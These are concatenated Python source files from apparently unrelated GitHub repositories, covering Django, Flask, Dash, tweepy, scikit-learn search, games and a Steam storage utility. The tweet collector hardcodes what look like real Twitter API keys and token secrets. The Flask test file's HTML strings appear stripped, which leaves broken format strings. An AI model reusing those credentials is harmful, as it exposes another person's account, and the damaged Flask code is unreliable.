'ml_tiny_int': 'FILM_TINY_INT',\n 'ml_int': 'FILM_INT',\n 'ml_array_int': 'FILM_ARRAY_INT',\n 'ml_array_double': 'FILM_ARRAY_DOUBLE',\n }\n}\n\ndatabase_scheme = {\n 'FILM_GENERAL': {\n 'FILM_ID': 'INTEGER',\n 'FILM_DESC': 'STRING',\n 'FILM_NAME': 'CHAR(255)'\n },\n 'FILM_CREW': {\n 'FILM_ID': 'INTEGER',\n 'FILM_STAR': 'ARRAY',\n 'FILM_RATING': 'DOUBLE',\n 'FILM_DIRECTOR': 'ARRAY',\n 'FILM_WRITER': 'ARRAY'\n },\n 'FILM_ML': {\n 'FILM_ID': 'INTEGER',\n 'FILM_TINY_INT': 'TINYINT',\n 'FILM_INT': 'INTEGER',\n 'FILM_ARRAY_INT': 'ARRAY',\n 'FILM_ARRAY_DOUBLE': 'ARRAY',\n }\n}\n","repo_name":"NobodyOne04/unix_lab","sub_path":"loaders/src/database_config.py","file_name":"database_config.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"ur","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4692249082","text":"from rest_framework import serializers\nfrom rest_framework.utils.serializer_helpers import ReturnDict\nfrom api.models import Trail, TrailImage\n\n\nclass TrailListSerializer(serializers.ListSerializer):\n class Meta:\n model = Trail\n fields = ('id', 'name', 'latitude', 'longitude', 'length', 'difficulty', 'restroom',)\n\n @property\n def data(self):\n ret = super(serializers.ListSerializer, self).data\n ret = {'trails': ret}\n return ReturnDict(ret, serializer=self)\n\n\nclass TrailSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = Trail\n fields = ('id', 'name', 'latitude', 'longitude', 'length', 'difficulty', 'restroom')\n list_serializer_class = TrailListSerializer\n\n\nclass TrailImageSerializer(serializers.ModelSerializer):\n trail = TrailSerializer()\n\n class Meta:\n model = TrailImage\n fields = ('image', 'timestamp', 'trail',)","repo_name":"HikeOregon/web-app","sub_path":"api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28352655186","text":"import json\nfrom flask import Flask, redirect, escape, session, request\nfrom maat_webservice import Webservice\n\n\nclass TestWebservice(Webservice):\n \"\"\"Maât maat_webservice\"\"\"\n\n def __init__(self, *args, **kwargs):\n Webservice.__init__(self, *args, **kwargs)\n\n def additional_route(self):\n \"\"\"Additional route for test authentification\"\"\"\n\n @self.app.route('/info')\n def index():\n if 'username' in session:\n\n username_active = escape(session[\"username\"])\n ret = 'Active User: %s
' % (username_active, username_active)\n liste = json.loads(session['users'])\n print(liste)\n if liste is not None:\n for i in json.loads(session[\"users\"]):\n mi = escape(i)\n if mi == username_active:\n continue\n ret += 'Test: %s
' % (mi, mi)\n ret += 'Add a user
'\n ret += 'Clean session
'\n return ret\n return '

No active session
Add a user

'\n\n @self.app.route(\"/test/\")\n def test(username):\n if 'username' in session:\n liste = json.loads(session['users'])\n print(liste)\n if liste is not None and username in liste:\n session['username'] = escape(username)\n return redirect(\"/\")\n return redirect(\"/info\")\n\n @self.app.route('/login', methods=['GET', 'POST'])\n def login():\n if request.method == 'POST':\n session['username'] = request.form['username']\n if 'users' in session:\n a = json.loads(session['users'])\n if a is None:\n a = []\n a.append(request.form['username'])\n session['users'] = json.dumps(a)\n else:\n session['users'] = json.dumps([request.form['username']])\n\n return redirect(\"/info\")\n return '''\n
\n

\n

\n \n '''\n\n @self.app.route('/logout')\n def logout():\n session.pop('username', None)\n session.pop('users', None)\n return redirect(\"/info\")\n\n @self.app.route('/clean')\n def clean():\n session.clear()\n return redirect(\"/info\")\n\n def login_required(self, func):\n \"\"\"Check if the user is connected\"\"\"\n\n def test(*args, **kwargs):\n try:\n if \"username\" not in session:\n return redirect(\"/login\")\n return func(*args, **kwargs)\n except Exception as e:\n return str(e), 500\n\n # Change the name of the function (for flask)\n test.__name__ = func.__name__\n return test\n\n def username(self):\n \"\"\"\n Get the username of the client from session.\n\n This method is use by session manager or backend to get the username of the current client by using session\n \"\"\"\n if \"username\" in session:\n return escape(session['username'])\n return redirect(\"/info\")\n\n # def route_add_session(self):\n # \"\"\"Will create a session\"\"\"\n # try:\n # backend = self.load_balancer.balance(self.username())\n # if self.__fake:\n # return redirect(backend.url(\"/add_sessions/%s\" % self.username()))\n # else:\n # return redirect(backend.url())\n # except Exception as e:\n # print(\"Error: %s\" % str(e))\n # return redirect(\"/\")\n\n","repo_name":"Valdimus/Maat","sub_path":"maat_webservice/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4017,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24654792774","text":"import tweepy\nimport csv\nimport pandas as pd\nfrom time import time\n\nprint(\"Started\")\n\n#API key:\nconsumer_key = 'AcgJgEnjNdEQIyCjXB14vG9n9'\n\n#API secret key:\nconsumer_secret = 'JiXHa1JQImgjJVECRjw9nTAmnUEQSaGJgRC84qfTbHGK7wa5Zd'\n\n#Access token:\naccess_token = '1694114796-Gs14uxJhaJYsu4pgkaCmCCP1mDMi6oe738vhazN'\n\n#Access token secret:\naccess_token_secret = 'H12jMiBb8JbsCG8nYqsCmiIDfOs2RiRXeQNycO0N1CUKr'\n\n\nauth = tweepy.OAuthHandler(consumer_key, consumer_secret)\nauth.set_access_token(access_token, access_token_secret)\n\napi = tweepy.API(auth,wait_on_rate_limit=True)\n\n\ndatastorage = None\n\n\nsearch_words = \"#CoronaVirus\"\n\n# yyyy/mm/dd\ndate_since = \"2020-03-04\"\nprint(\"Date since:\", date_since)\n\nnew_search = search_words + \" -filter:retweets\"\n\n\nstart_time = time()\nprint(\"Collection started at:\", start_time)\n\ntweets = tweepy.Cursor(api.search, q=new_search,lang=\"en\", since=date_since).items(1000)\n\ndetails = [[tweet.id,tweet.user.screen_name,tweet.created_at,tweet.user.location,tweet.place.bounding_box.coordinates[0][0][0],tweet.place.bounding_box.coordinates[0][0][1],tweet.text] for tweet in tweets if tweet.place]\ntweet_data = pd.DataFrame(data=details, columns=['ID',\"Name\",\"Created_at\",\"Location\",\"Lat\",\"Long\",\"Text\"])\nif datastorage is None:\n datastorage = tweet_data\nelse:\n datastorage = datastorage.append(tweet_data)\nprint(len(datastorage), \"currently read tweets.\")\nif time() - start_time > 300:\n start_time = time()\n print(\"Collection started at:\", start_time)\n print(\"***\", len(datastorage), \"SAVED TWEETS.\")\n try:\n dataset = pd.read_csv(r'./Dataset_Twitter.csv')\n dataset = dataset.append(datastorage)\n dataset.to_csv(r'./Dataset_Twitter.csv', index = False, header=True)\n except IOError:\n datastorage.to_csv(r'./Dataset_Twitter.csv', index=False, header=True)\n datastorage = None\n","repo_name":"Yicheng-Lu/Social-Network-Data-Analysis","sub_path":"tweet_collector.py","file_name":"tweet_collector.py","file_ext":"py","file_size_in_byte":1868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40319028621","text":"import yaml\nimport os\nfrom yaml.loader import FullLoader\nimport numpy as np\nimport pandas as pd\nimport json\nimport pickle\nimport pandas as pd\nfrom .libraries import *\nimport sys\nfrom Files.metrics import Metrics as met\nclass hyperparameter:\n def optimize(model_str,modelname,userinputconfig,datapath,dataconfig,target_column,hyperparams,test_ratio):\n \"\"\"\n This function in takes the string consisting of the name and the hyperparameters of the model and uses eval function to create the model.\n Keylist is the dictionary consisting of the infomation about the user input ('subject to further changes')\n Name is the name of the model selected (subject to future changes)\n \"\"\"\n\n data=pd.read_csv(datapath)\n ydata=data[target_column]\n data.drop([target_column],inplace=True,axis=1)\n xdata=data\n\n with open(userinputconfig) as f:\n userinputconfig= yaml.load(f,Loader=FullLoader)\n\n with open(dataconfig) as c:\n dataconfig=yaml.load(c,Loader=FullLoader)\n\n params={}\n for model in userinputconfig:\n if model[\"name\"]==modelname:\n \n modelname=model[\"name\"]\n print(modelname)\n model_type=model[\"type\"]\n for hyper in model[\"hyper\"]:\n if hyper[\"ischanged\"]==False:\n if hyper[\"vary\"]:\n if hyper[\"type\"]==\"options\":\n params[hyper[\"name\"]]=hyper[\"options\"]\n elif hyper[\"type\"]==\"bool\":\n params[hyper[\"name\"]]=[True,False]\n elif hyper[\"type\"]==\"float\" or hyper[\"type\"]==\"int\":\n if hyper[\"range\"][\"type\"]==\"linear\":\n if hyper[\"type\"]==\"int\":\n params[hyper[\"name\"]]=(np.linspace(hyper[\"range\"][\"min\"],hyper[\"range\"][\"max\"],hyper[\"range\"][\"num_samp\"])).astype(int)\n else:\n print(hyper)\n params[hyper[\"name\"]]=np.linspace(hyper[\"range\"][\"min\"],hyper[\"range\"][\"max\"],hyper[\"range\"][\"num_samp\"])\n if hyper[\"range\"][\"type\"]==\"log\":\n if hyper[\"type\"]==\"int\":\n params[hyper[\"name\"]]=(np.logspace(np.log10(hyper[\"range\"][\"min\"]),np.log10(hyper[\"range\"][\"max\"]),hyper[\"range\"][\"num_samp\"])).astype(int)\n else:\n params[hyper[\"name\"]]=(np.logspace(np.log10(hyper[\"range\"][\"min\"]),np.log10(hyper[\"range\"][\"max\"]),hyper[\"range\"][\"num_samp\"]))\n else:\n if hyper[\"type\"]==\"option\":\n params[hyper[\"name\"]]=hyper[\"options\"]\n model=eval(model_str)\n sys.stdout=open(\"logs.log\",\"a+\")\n with open(\"logs.log\",\"a+\") as f:\n f.write(modelname)\n \n clf=RandomizedSearchCV(model, params,verbose=51,n_jobs=-1)\n \n x_train,x_test,y_train,y_test=train_test_split(xdata,ydata,test_size=test_ratio)\n print(\"working on \"+ modelname)\n clf.fit(x_train,y_train)\n hyperparams[modelname]=clf.best_params_\n \n print(\"model completed for \" + modelname)\n \n location=os.path.join(dataconfig[\"location\"],str(dataconfig[\"id\"])+\"_model\")\n picklepath=os.path.join(location,(str(modelname) +\".pkl\"))\n with open(picklepath,\"wb\") as f:\n pickle.dump(clf,f)\n \n prediction=clf.predict(x_test)\n metricsrow=met.calculate_metrics(modelname,model_type,prediction,y_test)\n print(\"hyper params are : \",hyperparams[modelname],\" for \",modelname)\n return metricsrow, hyperparams","repo_name":"nikzagarwal/Project_21","sub_path":"Files/hyperparameter.py","file_name":"hyperparameter.py","file_ext":"py","file_size_in_byte":3928,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"5752684679","text":"import seaborn as sn\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\nimport numpy as np\n\ncats = [\"Apparel\",\"Automotive\",\"Beauty\",\"Beverage\",\"Business\",\"Construction\",\"Dining\",\"Education\",\"Financial\",\n \"Food\",\"Health and Medicine\",\"Household\",\"Shopping and Retail\",\"Toiletries\",\"Tourism and Travel\",\"Transport and Logistics\"]\n# rev_cats = cats[::-1]\n\ndef plotConfusionArray(array):\n df_cm = pd.DataFrame(array, index = [i for i in cats],\n columns = [i for i in cats])\n plt.figure(figsize = (16,7))\n sn.heatmap(df_cm, annot=True)\n\n plt.show()\n\ndef confusionArrayFromInOut(in_vals, out_vals):\n return np.array(tf.math.confusion_matrix(in_vals, out_vals, num_classes=len(cats)))\n\ndef AccuracyArrayFromInOut(in_vals, out_vals):\n numRight = dict()\n numTot = dict()\n accuracies = dict()\n for index, inp in enumerate(in_vals):\n if not inp in numTot:\n numTot[inp] = 0\n numRight[inp] = 0\n numTot[inp] += 1\n if out_vals[index] == inp:\n numRight[inp] += 1\n \n for cat in numTot.keys():\n accuracies[cat] = numRight[cat]/numTot[cat]\n \n return accuracies\n\ndef numOccurences(vals):\n numTot = dict()\n for val in vals:\n if not val in numTot:\n numTot[val] = 0\n numTot[val] += 1\n \n return numTot\n\n# plotConfusionArray(confusionArrayFromInOut([0,0,0,0,1,1,1,2,2,2,2,2,3,3,3,3,4,4,4,4,4,4,5,5,5,6,6,7,7,7,7,7,8,8,9,9,9,9,9], \n# [0,1,2,0,3,0,3,2,4,5,4,3,2,3,4,3,6,5,6,7,9,9,4,5,6,1,8,9,9,0,3,5,5,9,8,8,6,8,9]))\n\n# print(AccuracyArrayFromInOut([0,0,0,0,1,1,1,2,2,2,2,2,3,3,3,3,4,4,4,4,4,4,5,5,5,6,6,7,7,7,7,7,8,8,9,9,9,9,9], \n# [0,1,2,0,3,0,3,2,4,5,4,3,2,3,4,3,6,5,6,7,9,9,4,5,6,1,8,9,9,0,3,5,5,9,8,8,6,8,9]))\n\n# print(numOccurences([0,0,0,0,1,1,1,2,2,2,2,2,3,3,3,3,4,4,4,4,4,4,5,5,5,6,6,7,7,7,7,7,8,8,9,9,9,9,9]))","repo_name":"heckenna/SloganGenerationProject","sub_path":"testPlot.py","file_name":"testPlot.py","file_ext":"py","file_size_in_byte":1947,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"34657014441","text":"import os\nimport random\nimport time\n\nfrom AI import AI\nfrom Game import Game, COLS, ROWS, PLAYER_1, PLAYER_2\n\ngame = Game()\n\n\ndef print_ending(game):\n if game.winner == 'Draw':\n print('\\nGame ended in draw!')\n else:\n print('\\n{} won the game!'.format(game.winner))\n\n\ndef print_game(game):\n os.system('clear')\n print(game)\n time.sleep(0.2)\n\n\ndef random_play():\n game.__init__()\n i = 0\n while not game.check_winner():\n i += 1\n\n player = PLAYER_1 if i % 2 else PLAYER_2\n\n # Make player move\n while not game.put_piece(random.randrange(0, COLS), player):\n pass\n\n print_game(game)\n\n print_ending(game)\n\n\ndef pvp():\n game.__init__()\n i = 0\n\n print(game)\n while not game.check_winner():\n i += 1\n\n player = PLAYER_1 if i % 2 else PLAYER_2\n\n # Make player move\n while True:\n try:\n move = int(input('\\n{} - Enter col:'.format(player))) - 1\n except ValueError:\n continue\n except EOFError:\n import sys; sys.exit()\n\n if game.put_piece(move, player):\n break\n\n print_game(game)\n\n print_ending(game)\n\n\ndef pve(turn=0):\n ai = AI(PLAYER_1, PLAYER_2)\n i = 0\n game.__init__()\n print_game(game)\n while not game.check_winner():\n i += 1\n\n if i % 2 == turn:\n # TODO: Get AI turn\n # player = PLAYER_1\n # move =\n move = ai.search(game)\n game.put_piece(move, PLAYER_1)\n print_game(game)\n print('\\n',ai.pred)\n else:\n # Make player move\n while True:\n try:\n move = int(input('\\n{} - Enter col:'.format(PLAYER_2))) - 1\n except ValueError:\n continue\n except EOFError:\n import sys; sys.exit()\n\n if game.put_piece(move, PLAYER_2):\n break\n print_game(game)\n\n print_ending(game)\n\n\ndef ave():\n ai = AI(PLAYER_1, PLAYER_2)\n i = 0\n game.__init__()\n\n while not game.check_winner():\n i += 1\n\n if i % 2 == 0:\n # TODO: Get AI turn\n # player = PLAYER_1\n # move =\n move = ai.search(game)\n game.put_piece(move, PLAYER_1)\n\n else:\n while not game.put_piece(random.randrange(0, COLS), PLAYER_2):\n pass\n\n #print_game(game)\n #print(ai.pred)\n\n return game.winner\n #print_ending(game)\n\n\ndef ava():\n ai_1 = AI(PLAYER_1, PLAYER_2, max_depth=6)\n ai_2 = AI(PLAYER_2, PLAYER_1, max_depth=4)\n i = 0\n game.__init__()\n\n while not game.check_winner():\n i += 1\n\n if i % 2:\n # TODO: Get AI turn\n # player = PLAYER_1\n # move =\n move = ai_1.search(game)\n game.put_piece(move, PLAYER_1)\n else:\n move = ai_2.search(game)\n game.put_piece(move, PLAYER_2)\n\n print_game(game)\n\n print_ending(game)\n\n\nif __name__ == '__main__':\n# pvp()\n# pve()\n# ava()\n results = [0, 0, 0]\n for i in range(1000):\n if i % 10 == 0:\n print(i)\n winner = ave()\n if winner == PLAYER_1:\n results[0] += 1\n elif winner == \"Draw\":\n results[1] += 1\n elif winner == PLAYER_2:\n results[2] += 1\n\n\n","repo_name":"jtfidje/ikt623","sub_path":"connect_four/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42653168565","text":"import numpy as np\n\nfrom utils import onehot, decide, importance_sampling_ratio, mse\n\nclass MC_LEARNER():\n def __init__(self, env):\n self.observation_space, self.action_space = env.observation_space, env.action_space\n\n self.return_counts = np.zeros(self.observation_space.n)\n self.return_sums = np.zeros(self.observation_space.n)\n self.return_square_sums = np.zeros(self.observation_space.n)\n\n self.expected_return = np.zeros(self.observation_space.n)\n self.variance_of_return = np.zeros(self.observation_space.n)\n\n def backward_step(self, state, G):\n self.return_sums[state] += G\n self.return_counts[state] += 1\n\n old_expectation = self.expected_return[state]\n new_expectation = self.return_sums[state] / self.return_counts[state]\n self.return_square_sums[state] += (G - old_expectation) * (G - new_expectation)\n\n self.expected_return[state] = new_expectation\n self.variance_of_return[state] = self.return_square_sums[state] / self.return_counts[state]\n\n\ndef MC(env, episodes, target, behavior, Lambda, gamma = lambda x: 0.95, alpha = 0.05, beta = 0.0001, diagnose = False):\n \"\"\"\n episodes: number of episodes\n target: target policy matrix (|S|*|A|)\n behavior: behavior policy matrix (|S|*|A|)\n Lambda: LAMBDA object determining each lambda for each feature (or state or observation)\n gamma: anonymous function determining each lambda for each feature (or state or observation)\n alpha: learning rate for the weight vector of the values\n beta: learning rate for the auxiliary vector for off-policy\n \"\"\"\n learner = MC_LEARNER(env)\n expected_return_trace = []\n variance_of_return_trace = []\n\n for _ in range(episodes):\n state, done = env.reset(), False\n\n # Get the (s, a, r) pairs for an entire episode.\n episode = []\n done = False\n while not done:\n action = decide(state, behavior)\n next_state, reward, done, _ = env.step(action)\n if done:\n learner.return_counts[next_state] += 1\n episode.append((state, action, reward))\n state = next_state\n\n expected_return_trace.append(np.copy(learner.expected_return))\n variance_of_return_trace.append(np.copy(learner.variance_of_return))\n\n # Update expected G for every visit.\n G = 0.0\n for t in range(len(episode)-1, -1, -1):\n gamma_val = gamma(state)\n state, action, reward = episode[t]\n rho = importance_sampling_ratio(target, behavior, state, action)\n G = rho*(reward + gamma_val * G)\n\n learner.backward_step(state, G)\n\n return expected_return_trace, variance_of_return_trace, learner.return_counts","repo_name":"shubhampachori12110095/MTA","sub_path":"MC.py","file_name":"MC.py","file_ext":"py","file_size_in_byte":2801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39200515962","text":"#!/usr/bin/env python\n\nimport Image, ImageDraw, ImageFont\n\nim = Image.open(\"image.jpg\")\nprint(im.format, im.size, im.mode)\n\nbox = (0, 0, 400, 400)\nregion = im.crop(box)\n# region.show()\n\ndraw = ImageDraw.Draw(im)\ndraw.line((0, 0, 200, 200), fill = 128)\ndraw.arc((0, 0, 200, 200), 0, 45, fill = (0, 255, 0))\ndraw.text((0, 0), \"Hello PIL\", fill=255)\n\nfont = ImageFont.truetype(\"arial.ttf\", 20)\ndraw.text((20, 20), \"Hello Boy!\", font=font, fill=(0, 255, 0))\n\ndel draw\n\nim.show()\n\n\n","repo_name":"yjwx0017/test","sub_path":"python-codes/testPIL.py","file_name":"testPIL.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1422823018","text":"from dash_extensions.enrich import DashProxy, html, dcc, ServersideOutputTransform\nimport dash_bootstrap_components as dbc\nfrom dash_app.callbacks import register_callbacks\nfrom dash_app.home import home_layout\nfrom dash_app.enrol import form_layout\nfrom dash_app.records import customer_records\nfrom dash_app.search import search_layout\nfrom flask_login import login_required\n\n\n\n\nstyle_2 = {\n}\nnav = dbc.Nav([\n dbc.NavItem(dbc.NavLink(\"Home\", id='home', href='/home', style=style_2), class_name='me-1'),\n dbc.NavItem(dbc.NavLink(\"Register\", id='register', href='/register', style=style_2), class_name='me-1'),\n dbc.NavItem(dbc.NavLink(\"Records\", id='records', href='/records', style=style_2), class_name='me-1'),\n dbc.NavItem(dbc.NavLink(\"Search\", id='search', href='/search', style=style_2), class_name='me-1'),\n dbc.NavItem(dbc.NavLink(\"Logout\", id='logout', href='/logout', style=style_2, external_link=True), class_name='me-1')\n],navbar=True, justified=True, class_name='mx-auto fs-4')\n\nnavbar = dbc.Navbar(\n dbc.Container([\n dbc.Col([\n html.A([\n dbc.Row([\n dbc.Col([\n html.Img(src='assets/tbcn-logo2.png', width=200, height=100,className='navbar-brand rounded float-start'),\n html.Small('To Be Connected Nigeria', className='light')\n ], class_name='col-3 align-center'),\n ], align='center', className='g-0'),\n ], href='/'),\n ], align='start', class_name='col-3'),\n dbc.Col([\n html.H2('Save-80 Geo-locator'), #style={'color':'#B8E1E9'}\n dbc.NavbarToggler(id='nav-toggler', n_clicks=0),\n dbc.Collapse(nav, id='navbar-collapse', is_open=False, navbar=True)\n ],class_name='col-6 text-center header-text'),\n dbc.Col(html.Img(src='assets/atmosfair.png', width=200, height=100,className='navbar-brand rounded float-end'))\n ], fluid=True, class_name='d-flex justify-content-center')\n,id='navbar', class_name='navbar')\n\n\nFOOTER_STYLE = {\n \"position\": \"fixed\",\n \"bottom\": 0,\n \"left\": 0,\n \"right\": 0,\n 'height':'80px',\n # 'background': '#bdc3c7',\n # 'background': '-webkit-linear-gradient(to top, #2c3e50, #bdc3c7)',\n # 'background': 'linear-gradient(to top, #2c3e50, #bdc3c7)',\n\n\n}\ncontent_con = {\n # 'backround-color': '#606c88',\n # 'background': '-webkit-linear-gradient(0deg, #606c88 0%, #3f4c6b 100%)',\n # 'background': 'linear-gradient(0deg, #606c88 0%, #3f4c6b 100%)',\n 'background-image': 'url(assets/background.jpg)'\n}\n\nmain_layout = dbc.Container([\n dcc.Store(id='cached_data'),\n dcc.Location(id='location'),\n dcc.Interval(id='query_data', interval=15*1000),\n dbc.Row(navbar, class_name='sticky-top'),\n dbc.Row(\n dbc.Col(id='content_container', lg={'size':12}, class_name='content-con') #content_con\n ),\n dbc.Row([\n dbc.Col([\n html.Small('13a, Mambila Street, Aso Drive, Abuja.', className='m-info'), #, style={'color':'#B8E1E9'}\n html.A('www.tbcn.com.ng', href='http://tbcn.com.ng') #style={'color':'#B8E1E9'}\n ], class_name='me-auto info_footer'),\n dbc.Col([\n html.H3('Powered by Metaverse®', className='footer_text mt-2')\n ], class_name='text-center footer mt-0'),\n dbc.Col([\n html.Small('To Be Connected Nigeria®', className='m-info ms-auto'), #, style={'color':'#B8E1E9'}\n html.Small('2022©', className='ms-auto') #, style={'color':'#B8E1E9'}\n ], class_name='text-center info_footer')\n ], class_name='d-flex justify-content-center bg-light', style=FOOTER_STYLE) \n], fluid=True, class_name='main_content')\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\ndef create_dash_app(server):\n dash_app = DashProxy(__name__, external_stylesheets=[dbc.themes.BOOTSTRAP], transforms=[ServersideOutputTransform()], server=server, url_base_pathname='/')\n dash_app.title = \"Save-80\"\n # server = dash_app.server\n dash_app.validation_layout = html.Div([main_layout, home_layout, form_layout, customer_records, search_layout])\n dash_app.layout = main_layout\n\n register_callbacks(dash_app)\n _protect_dashviews(dash_app)\n return dash_app\n\n\ndef _protect_dashviews(dashapp):\n for view_func in dashapp.server.view_functions:\n if view_func.startswith(dashapp.config.url_base_pathname):\n dashapp.server.view_functions[view_func] = login_required(\n dashapp.server.view_functions[view_func])\n","repo_name":"saifvoice/Asset-Tracker-Project","sub_path":"dash_app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4531,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"15128838389","text":"\nimport os\nimport re\nimport json\nimport logging\nfrom time import time\nfrom io import open\nfrom contextlib import contextmanager\nimport fnmatch\nimport shutil\nfrom collections import UserDict\nimport sqlite3\nfrom appdirs import AppDirs\nfrom steamctl import __appname__\n\n_LOG = logging.getLogger(__name__)\n_appdirs = AppDirs(__appname__)\n\ndef ensure_dir(path, mode=0o750):\n dirpath = os.path.dirname(path)\n\n if not os.path.exists(dirpath):\n _LOG.debug(\"Making dirs: %s\", dirpath)\n os.makedirs(dirpath, mode)\n\ndef normpath(path):\n if os.sep == '/':\n path = path.replace('\\\\', '/')\n return os.path.normpath(path)\n\ndef sanitizerelpath(path):\n return re.sub(r'^((\\.\\.)?[\\\\/])*', '', normpath(path))\n\n\nclass FileBase(object):\n _root_path = None\n\n def __init__(self, relpath, mode='r'):\n self.mode = mode\n self.relpath = relpath\n self.path = normpath(os.path.join(self._root_path, relpath))\n self.filename = os.path.basename(self.path)\n\n def __repr__(self):\n return \"%s(%r, mode=%r)\" % (\n self.__class__.__name__,\n self.relpath,\n self.mode,\n )\n\n def exists(self):\n return os.path.exists(self.path)\n\n def mkdir(self):\n ensure_dir(self.path, 0o700)\n\n def older_than(seconds=0, minutes=0, hours=0, days=0):\n delta = seconds + (minutes*60) + (hours*3600) + (days*86400)\n ts = os.path.getmtime(self.path)\n return ts + delta > time()\n\n def open(self, mode):\n _LOG.debug(\"Opening file (%s): %s\", mode, self.path)\n self.mkdir()\n return open(self.path, mode)\n\n def read_text(self):\n if self.exists():\n with self.open('r') as fp:\n return fp.read()\n\n def write_text(self, data):\n with self.open('w') as fp:\n fp.write(data)\n\n def read_json(self):\n if self.exists():\n with self.open('r') as fp:\n return json.load(fp)\n\n def write_json(self, data, pretty=True):\n with self.open('w') as fp:\n if pretty:\n json.dump(data, fp, indent=4, sort_keys=True)\n else:\n json.dump(data, fp)\n\n def remove(self):\n _LOG.debug(\"Removing file: %s\", self.path)\n\n if self.exists():\n os.remove(self.path)\n\n def secure_remove(self):\n _LOG.debug(\"Securely removing file: %s\", self.path)\n\n if self.exists():\n with open(self.path, 'r+b') as fp:\n size = fp.seek(0, 2)\n\n fp.seek(0)\n chunk = b'0' * 4096\n\n while fp.tell() + 4096 < size:\n fp.write(chunk)\n fp.write(chunk[:max(size - fp.tell(), 0)])\n\n fp.flush()\n os.fsync(fp.fileno())\n\n os.remove(self.path)\n\n def __enter__(self):\n self._fp = self.open(self.mode)\n return self._fp\n\n def __exit__(self, exc_type, exc_value, traceback):\n self._fp.close()\n\nclass UserDataFile(FileBase):\n _root_path = _appdirs.user_data_dir\n\nclass UserCacheFile(FileBase):\n _root_path = _appdirs.user_cache_dir\n\nclass DirectoryBase(object):\n _root_path = None\n _file_type = None\n\n def __init__(self, path='.'):\n self.path = normpath(os.path.join(self._root_path, path))\n\n if self.exists() and not os.path.isdir(self.path):\n raise ValueError(\"Path is not a directory: %s\" % self.path)\n\n def mkdir(self):\n ensure_dir(self.path + os.sep, 0o700)\n\n def exists(self):\n return os.path.exists(self.path)\n\n def remove(self):\n _LOG.debug(\"Removing directory: %s\", self.path)\n shutil.rmtree(self.path)\n\n def iter_files(self, pattern=None, recurse=False):\n if not os.path.exists(self.path):\n return\n\n for root, dirs, files in os.walk(self.path):\n if not recurse and self.path != root:\n break\n\n if pattern:\n files = fnmatch.filter(files, pattern)\n\n yield from (self._file_type(os.path.join(root, filename)) for filename in files)\n\nclass UserDataDirectory(DirectoryBase):\n _root_path = _appdirs.user_data_dir\n _file_type = UserDataFile\n\nclass UserCacheDirectory(DirectoryBase):\n _root_path = _appdirs.user_cache_dir\n _file_type = UserCacheFile\n\n\nclass SqliteDict(UserDict):\n def __init__(self, path=':memory:'):\n if isinstance(path, FileBase):\n path.mkdir()\n path = path.path\n\n self.path = path\n self._db = sqlite3.connect(path)\n self._db.execute('CREATE TABLE IF NOT EXISTS kv (key INTEGER PRIMARY KEY, value TEXT)')\n self._db.commit()\n\n def __repr__(self):\n return \"%s(path=%r)\" % (\n self.__class__.__name__,\n self.path,\n )\n\n def __len__(self):\n return self._db.execute('SELECT count(*) FROM kv').fetchone()[0]\n\n def __contain__(self, key):\n return self.get(key) is not None\n\n def get(self, key, default=None):\n row = self._db.execute('SELECT value FROM kv WHERE key = ?', (key,)).fetchone()\n return row[0] if row else default\n\n def __getitem__(self, key):\n val = self.get(key)\n\n if val is None:\n raise KeyError(key)\n else:\n if val and val[0] == '{' and val[-1] == '}':\n val = json.loads(val)\n return val\n\n def __setitem__(self, key, val):\n if isinstance(val, str):\n pass\n elif isinstance(val, dict):\n val = json.dumps(val)\n else:\n raise TypeError(\"Only str or dict types are allowed\")\n\n self._db.execute(\"REPLACE INTO kv VALUES (?, ?)\", (key, val))\n\n def items(self):\n for item in self._db.execute(\"SELECT key, value FROM kv ORDER BY key ASC\"):\n yield item\n\n def commit(self):\n self._db.commit()\n\n def __del__(self):\n self.commit()\n\n try:\n self._db.close(do_log=False, force=True)\n except Exception:\n pass\n","repo_name":"ValvePython/steamctl","sub_path":"steamctl/utils/storage.py","file_name":"storage.py","file_ext":"py","file_size_in_byte":6066,"program_lang":"python","lang":"en","doc_type":"code","stars":262,"dataset":"github-code","pt":"53"} +{"seq_id":"74441450408","text":"from django import forms\nfrom pagedown.widgets import PagedownWidget\nfrom .models import Post\nfrom django.utils import timezone\n\nclass PostForm(forms.ModelForm):\n\ttitle = forms.CharField()\n\tcontent = forms.CharField(\n\t\twidget = PagedownWidget(show_preview = False),\n\t required = True,\n\t)\n\tclass Meta:\n\t\tmodel = Post\n\t\tfields = [\n\t\t\t\"title\",\n\t\t\t\"content\",\n\t\t\t\"image\",\n\t\t\t\"draft\",\n\t\t\t\"publish\",\n\t\t]","repo_name":"jai-singhal/My-Blog","sub_path":"src/posts/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}

